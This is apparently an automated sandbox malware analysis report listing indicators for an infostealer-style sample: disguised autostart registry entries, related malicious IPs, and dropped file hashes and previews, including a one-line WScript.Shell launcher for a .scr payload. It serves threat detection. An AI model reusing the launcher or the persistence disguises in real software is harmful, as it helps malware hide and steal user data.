                                              09:35:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run COM Surrogate C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                              09:35:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SmartScreen C:\Users\user\AppData\Local\Temp\smartscreen.exe
                                              09:36:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run COM Surrogate C:\Users\user\AppData\Local\asm\COMSurrogate.exe

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              203.161.45.11nfkciRoR4j.exeGet hashmaliciousXmrigBrowse
                                                File.exeGet hashmaliciousOrcus, XmrigBrowse
                                                  45.74.38.211File.exeGet hashmaliciousOrcus, XmrigBrowse
                                                    172.67.74.1522b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                                    • api.ipify.org/
                                                    Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                                    • api.ipify.org/
                                                    y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                                                    • api.ipify.org/
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                    • api.ipify.org/
                                                    file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                    • api.ipify.org/

                                                    Domains

                                                    No context

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    M247GBmain_mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 196.16.120.168
                                                    f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                    • 91.202.233.141
                                                    https://forms.zohopublic.com/volt1g1/form/CompleteVehicleAccessoriesLtd/formperma/DjGG5qUda3jrtGBWWHgY7RiBMK57TQ9IEa34k6QF6G0Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.194.128.196
                                                    arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 77.232.195.200
                                                    social security statement.scr.exeGet hashmaliciousRedLineBrowse
                                                    • 45.61.159.66
                                                    http://flcu.phGet hashmaliciousUnknownBrowse
                                                    • 38.132.109.126
                                                    xd.x86.elfGet hashmaliciousMiraiBrowse
                                                    • 185.206.229.140
                                                    xd.spc.elfGet hashmaliciousMiraiBrowse
                                                    • 38.205.129.205
                                                    File.exeGet hashmaliciousOrcus, XmrigBrowse
                                                    • 45.74.38.211
                                                    aDGx3jaI7i.exeGet hashmaliciousRemcosBrowse
                                                    • 104.250.180.178
                                                    VNPT-AS-VNVNPTCorpVNmain_mips.elfGet hashmaliciousMiraiBrowse
                                                    • 113.174.188.228
                                                    main_ppc.elfGet hashmaliciousMiraiBrowse
                                                    • 14.165.136.80
                                                    https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                    • 203.161.63.125
                                                    https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                    • 203.161.63.125
                                                    lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.42.73
                                                    https://app.peony.ink/view/902b02a8-11f0-4e28-89b1-5318035c10ebGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                    • 203.161.63.125
                                                    New quotation request.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.42.73
                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 14.234.225.230
                                                    sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 14.170.3.101
                                                    sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                    • 14.253.31.193
                                                    CLOUDFLARENETUSPO#2207008 .docmGet hashmaliciousSnake KeyloggerBrowse
                                                    • 188.114.97.6
                                                    Voicemail_+Transcription001799.docxGet hashmaliciousUnknownBrowse
                                                    • 104.21.64.1
                                                    purchase order.exeGet hashmaliciousFormBookBrowse
                                                    • 104.21.7.187
                                                    pe61BNJmLf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 172.67.165.166
                                                    https://l.user-edenred-meyclub.kadeos.com/rts/go2.aspx?h=3782162&tp=i-1NHD-99-2ZH4-1HXNG6-20-1PPCf-1c-11KR2-1HWQl1-lBCrdGKkeH-2H4ZZZ&pi=6DvBMG0gjxmwWZBUOtvVSRjwHoaoPzxcEck6D3-7U78&x=i-1NHD-99-2ZH4-1HXNG6-20-1PPCf-1c-11KR2-1HWQl1-lBCrdGKkeH-2H4ZZZ%7c612254%7c1175284778&hp2=b88d9aa5cea778a386a66e248545bc7b83591c6077edf33fe6b47536c9d63d12Get hashmaliciousUnknownBrowse
                                                    • 104.18.16.32
                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 172.67.165.166
                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 104.21.16.9
                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 104.21.16.9
                                                    PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.74.152

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Users\user\AppData\Local\Temp\491505\Dr.comSetup.exeGet hashmaliciousVidarBrowse
                                                      Setup.exeGet hashmaliciousVidarBrowse
                                                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                          xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                                                            ton.exeGet hashmaliciousVidarBrowse
                                                              ton.exeGet hashmaliciousVidarBrowse
                                                                File.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                  Full_Setup_v24.exeGet hashmaliciousLummaC StealerBrowse
                                                                    file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, LummaC StealerBrowse
                                                                      'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                        C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSetup.exeGet hashmaliciousVidarBrowse
                                                                          Setup.exeGet hashmaliciousVidarBrowse
                                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                              xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                                                                                ton.exeGet hashmaliciousVidarBrowse
                                                                                  ton.exeGet hashmaliciousVidarBrowse
                                                                                    File.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                                      Full_Setup_v24.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, LummaC StealerBrowse
                                                                                          'Setup.exeGet hashmaliciousLummaC StealerBrowse

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\Dr.com
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):180
                                                                                            Entropy (8bit):4.605364170525915
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:RiMIpGXIdPHo55wWAX+eLCMuL4EkD5mXsMd5NJLW2FZo5uWAX+eLCMuL4EkD5mXp:RiJBJHonwWDeLPqJkDFQ5vfFywWDeLP4
                                                                                            MD5:FD559E76BD719A56973F4A8820540B77
                                                                                            SHA1:C8ADCB5EA97F02E7FD38AC4A9550BD1E142A8A20
                                                                                            SHA-256:72A616940F5318776CD0D4DA5A1B23A0EFBA6BB3FEF153A74AFD06F1445301B4
                                                                                            SHA-512:AD105386FF35E84E5362BBD14D4BFA99E22ED9C3607AEF4CB912530105CBAC8852E0FDF60BF359C7174178D67FA4D812EF4261C626D2AE0BDD62B5EFA18F6B05
                                                                                            Malicious:true
                                                                                            Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\CreativePixel Tech\\ApolloPro.scr\" \"C:\\Users\\user\\AppData\\Local\\CreativePixel Tech\\E\"")

                                                                                            C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\Dr.com
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):893608
                                                                                            Entropy (8bit):6.620254876639106
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                                            MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                            SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                                            SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                                            SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: xoJxSAotVM.exe, Detection: malicious, Browse
                                                                                            • Filename: ton.exe, Detection: malicious, Browse
                                                                                            • Filename: ton.exe, Detection: malicious, Browse
                                                                                            • Filename: File.exe, Detection: malicious, Browse
                                                                                            • Filename: Full_Setup_v24.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: 'Setup.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\CreativePixel Tech\E

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\Dr.com
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6588393
                                                                                            Entropy (8bit):7.999970025562485
                                                                                            Encrypted:true
                                                                                            SSDEEP:196608:PSPuMRQDLs38E6dN9WngQLZ6fcjzSYSKWV4F5C8wBhgbB:PCRYLW68gQLZ6f6BECFY8wBhgbB
                                                                                            MD5:0A1E63FC10DD1DBB8B2DB81E2388BF99
                                                                                            SHA1:67AD39AABBF4875BC1B165CCD5AFC40194D1D3C8
                                                                                            SHA-256:122991768F589431B9166A4E22523BF48A53EFFF73FC2B191955E604196541B7
                                                                                            SHA-512:94C50F06E1D157381B9D0746044B5D015E2946B44291D92739783CB3ED9E91371CF7D1B981D3108D910D7A7000810FE69FBE6590F9A84F822B671866AB9DB5FC
                                                                                            Malicious:false
                                                                                            Preview:.*.;........<$D.\..n.X...o.V*N...s:1.p.(0:.4.8C.w.t..j$.....^o.1.,.....7X=.BM.a,f.`..}xOv...:l..M...z.d..<,U.\.?ZU...S..zs.....l..J.U..{nQ.@K..,{...R._.oX.2."k.P.R...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Ma......m@nD<....d....s..........x.C\X...........J...+....^.w.5............?r.Q..m;.....w.....;.&.......2..g2"~?]...PkA...p...G................@.......@......kC.R......%x....}...q..U-...(....%....V..?p.he....,.. .o.UA..1.An....H.`>$O.ng.)........s+V.p...'|.G...!.$..n.K...;E..<J.W.C3.lY....A8>..>..1...32...T8}..,...E.......\S..i=.#\In>3(..?....d..?..B-...@...s...@......m...........5...x..2).U.j....r>.,#.~.|.b.x...<#hg..|.D.... ..z.{F..P(G.......u.P...j_qC....X....&..KT.|.!.P.is.y.+.....V..42m#NM.9.R.5...W....C.S..(J H-..^..z.P.Y....L....N....{....C.T8u7...p.......J..~..S.0y(._2~........=..$.n5O..^h......6P...66>...=......o.X.........Z.Y>Q..../6.t-3.....`.:.......d....s....u.......X...=.9[...."... 5

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):15612
                                                                                            Entropy (8bit):5.0007665989277985
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:d1VoGIpN6KQkj2qkjh4iUxehQVKoxOdBMNXp5rvOjJiYo0ib4J:d1V3IpNBQkj2Ph4iUxehYKoxOdBMNZd4
                                                                                            MD5:A8D66A40EEA8831B03CDC478ED797E6E
                                                                                            SHA1:F2DB655B7A8F6A211E8F6D95B50B3D7BC325F7CE
                                                                                            SHA-256:09178396408F3B27CBE725A8A455B37894EE4A3DBFCC34636DD23E96AB97C8CA
                                                                                            SHA-512:33C1DA734E45158C61EA1679202BAA3813C71901C9B5D481A09F244C9653C4DD76C1CD12378468579595C3C8CC92F60E868982BB26236841CDAE7BDB5B455C8F
                                                                                            Malicious:false
                                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1872
                                                                                            Entropy (8bit):5.417350451770704
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:LWSU4y4RQmFoUeWmfmZ9tK8NWR8INfAB6byG0t:LLHyIFKL3OZ2KWZby5t
                                                                                            MD5:0F29F770073CD27507A8B4E9BF030D25
                                                                                            SHA1:D61E943AC3E6079FB2A370FE458A36D107D08FBC
                                                                                            SHA-256:A45A04C1CE3512E83B32BC7AC024AAB3E01CAE29914BB88793D6E0CFEC04FC86
                                                                                            SHA-512:EB4E2FE27EA926194223069F5D7C8ECA7B025C185FC709CAB18F7AF20F5272129A2465D3072156D9686EA4F7714ABC4995B71784D2198317BF04EE5D951B9A1D
                                                                                            Malicious:false
                                                                                            Preview:@...e...........m....................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                            C:\Users\user\AppData\Local\Temp\491505\B

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6588393
                                                                                            Entropy (8bit):7.999970025562485
                                                                                            Encrypted:true
                                                                                            SSDEEP:196608:PSPuMRQDLs38E6dN9WngQLZ6fcjzSYSKWV4F5C8wBhgbB:PCRYLW68gQLZ6f6BECFY8wBhgbB
                                                                                            MD5:0A1E63FC10DD1DBB8B2DB81E2388BF99
                                                                                            SHA1:67AD39AABBF4875BC1B165CCD5AFC40194D1D3C8
                                                                                            SHA-256:122991768F589431B9166A4E22523BF48A53EFFF73FC2B191955E604196541B7
                                                                                            SHA-512:94C50F06E1D157381B9D0746044B5D015E2946B44291D92739783CB3ED9E91371CF7D1B981D3108D910D7A7000810FE69FBE6590F9A84F822B671866AB9DB5FC
                                                                                            Malicious:false
                                                                                            Preview:.*.;........<$D.\..n.X...o.V*N...s:1.p.(0:.4.8C.w.t..j$.....^o.1.,.....7X=.BM.a,f.`..}xOv...:l..M...z.d..<,U.\.?ZU...S..zs.....l..J.U..{nQ.@K..,{...R._.oX.2."k.P.R...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Ma......m@nD<....d....s..........x.C\X...........J...+....^.w.5............?r.Q..m;.....w.....;.&.......2..g2"~?]...PkA...p...G................@.......@......kC.R......%x....}...q..U-...(....%....V..?p.he....,.. .o.UA..1.An....H.`>$O.ng.)........s+V.p...'|.G...!.$..n.K...;E..<J.W.C3.lY....A8>..>..1...32...T8}..,...E.......\S..i=.#\In>3(..?....d..?..B-...@...s...@......m...........5...x..2).U.j....r>.,#.~.|.b.x...<#hg..|.D.... ..z.{F..P(G.......u.P...j_qC....X....&..KT.|.!.P.is.y.+.....V..42m#NM.9.R.5...W....C.S..(J H-..^..z.P.Y....L....N....{....C.T8u7...p.......J..~..S.0y(._2~........=..$.n5O..^h......6P...66>...=......o.X.........Z.Y>Q..../6.t-3.....`.:.......d....s....u.......X...=.9[...."... 5

                                                                                            C:\Users\user\AppData\Local\Temp\491505\Dr.com

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):893608
                                                                                            Entropy (8bit):6.620254876639106
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                                            MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                            SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                                            SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                                            SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                            • Filename: xoJxSAotVM.exe, Detection: malicious, Browse
                                                                                            • Filename: ton.exe, Detection: malicious, Browse
                                                                                            • Filename: ton.exe, Detection: malicious, Browse
                                                                                            • Filename: File.exe, Detection: malicious, Browse
                                                                                            • Filename: Full_Setup_v24.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: 'Setup.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\Dr.com
                                                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):65440
                                                                                            Entropy (8bit):6.049806962480652
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                                            MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                                            SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                                            SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                                            SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

                                                                                            C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):49
                                                                                            Entropy (8bit):4.016374939798868
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:wAdks//tvBd95MAcGW2K3uc:wev/tHvcBcc
                                                                                            MD5:190C46B5065A4BDF11F434A3E8F49AE4
                                                                                            SHA1:F47DBF81648CFCDD9817F60E55326DAB0A2CB5CB
                                                                                            SHA-256:9D89630DA3BDE9505D4C2CC684EB01C2D4D7D11028D01D309ACA12B064F779E6
                                                                                            SHA-512:8F71EA206E367F2F32BF241DD8513A9F436EC4980C401527F4941048A66159B5909438381F7A36179208399FD7A0B41F208C9904E1AFD5D0DD0EF8EDB56661C6
                                                                                            Malicious:false
                                                                                            Preview:.X.%*................docsDomain."docs.google.com"

                                                                                            C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):16
                                                                                            Entropy (8bit):3.2743974703476995
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                            Malicious:false
                                                                                            Preview:MANIFEST-000001.

                                                                                            C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):367
                                                                                            Entropy (8bit):5.126252637063772
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:ku/2LN1N723iKKdK8age8Y5ouKu2KXx2KLlT/2LGWM+q2PN723iKKdK8age8Y5oc:ku/2pa5Kk8rcPXdLx/2aL+vVa5Kk8rcB
                                                                                            MD5:E2D9D758CC9BECEBD9077CF0A7AE2266
                                                                                            SHA1:FC94899556C1C7DA3503B36FCA7B987C77018E02
                                                                                            SHA-256:9E9E2E29A6809AD4EDD183D88FD11F97A22992ED46ED0727E6214DED43CBB610
                                                                                            SHA-512:4184908030351A0973E5F6CFB4917D7BDBFE15029EBA2317DBB96E4847EE7D06ACE57196B20FF4EFBD49572BEBAAF4FC29225B3E9DA62D3EA2361E5CCC003555
                                                                                            Malicious:false
                                                                                            Preview:2023/10/05-08:20:01.259 bac Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi since it was missing..2023/10/05-08:20:01.261 bac Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi/MANIFEST-000001.

                                                                                            C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:OpenPGP Secret Key
                                                                                            Category:dropped
                                                                                            Size (bytes):41
                                                                                            Entropy (8bit):4.704993772857998
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                            Malicious:false
                                                                                            Preview:.|.."....leveldb.BytewiseComparator......

                                                                                            C:\Users\user\AppData\Local\Temp\ArchiveContents\Edge\jdiccldimpdaibmpdkjnbmckianbfold\CURRENT

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):16
                                                                                            Entropy (8bit):3.2743974703476995
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                            Malicious:false
                                                                                            Preview:MANIFEST-000001.

                                                                                            C:\Users\user\AppData\Local\Temp\ArchiveContents\Edge\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):371
                                                                                            Entropy (8bit):5.20279173554588
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:kuSM2CJ1N723oH+Tcwt8age8Y55HEZzXELIx2KLlTSM22VOq2PN723oH+Tcwt8ai:kuSMpaYeb8rcHEZrEkVLxSMnVOvVaYeq
                                                                                            MD5:3A311D9DA4F59F7D2C9172443B96A6E7
                                                                                            SHA1:40B870D1CD0BD2CADEC557658EB009DD65CBD0FC
                                                                                            SHA-256:D857A15FCFDCC08CA4B4D4BDBAFE91320F2B5B24786E9F8F7FC45E01EB4776EF
                                                                                            SHA-512:2C2F52C559586BD0120A86B9F70BA48A8B7D85888E911A8FB530DEBF7E2A0987623CC6B54A37E3C77903C087E3EEC9C4074E4D68A7FA0B6C8E9B809567A5D557
                                                                                            Malicious:false
